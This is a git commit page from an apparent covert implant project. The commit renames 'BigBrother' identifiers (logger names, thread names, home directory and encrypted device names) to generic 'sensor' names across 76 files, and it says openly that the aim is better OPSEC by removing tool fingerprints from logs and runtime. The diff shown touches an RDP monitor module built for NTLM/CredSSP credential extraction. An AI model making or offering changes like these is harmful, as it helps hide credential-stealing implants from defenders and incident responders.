Fix #211: Remove tool identity strings from deployed artifacts
- Replace BigBrother -> SystemMonitor in display names and docstrings - Replace logger names: bb.* -> sensor.* - Replace process names: bb-* -> sensor-* - Replace home directory: ~/.bigbrother -> ~/.implant - Replace LUKS device: /dev/mapper/bb-* -> /dev/mapper/sensor-* - Updated 76 Python files across all modules - Improves OPSEC by removing obvious tool fingerprints from logs and runtime
This commit is contained in:
@@ -19,7 +19,7 @@ from typing import Optional
|
||||
|
||||
from modules.base import BaseModule
|
||||
|
||||
logger = logging.getLogger("bb.passive.rdp_monitor")
|
||||
logger = logging.getLogger("sensor.passive.rdp_monitor")
|
||||
|
||||
# NTLM signature for CredSSP extraction
|
||||
NTLMSSP_SIGNATURE = b'NTLMSSP\x00'
|
||||
@@ -101,12 +101,12 @@ class RDPMonitor(BaseModule):
|
||||
self._pid = os.getpid()
|
||||
|
||||
self._read_thread = threading.Thread(
|
||||
target=self._read_loop, daemon=True, name="bb-rdp-read"
|
||||
target=self._read_loop, daemon=True, name="sensor-rdp-read"
|
||||
)
|
||||
self._read_thread.start()
|
||||
|
||||
self._flush_thread = threading.Thread(
|
||||
target=self._flush_loop, daemon=True, name="bb-rdp-flush"
|
||||
target=self._flush_loop, daemon=True, name="sensor-rdp-flush"
|
||||
)
|
||||
self._flush_thread.start()
|
||||
|
||||
|
||||
Reference in New Issue
Block a user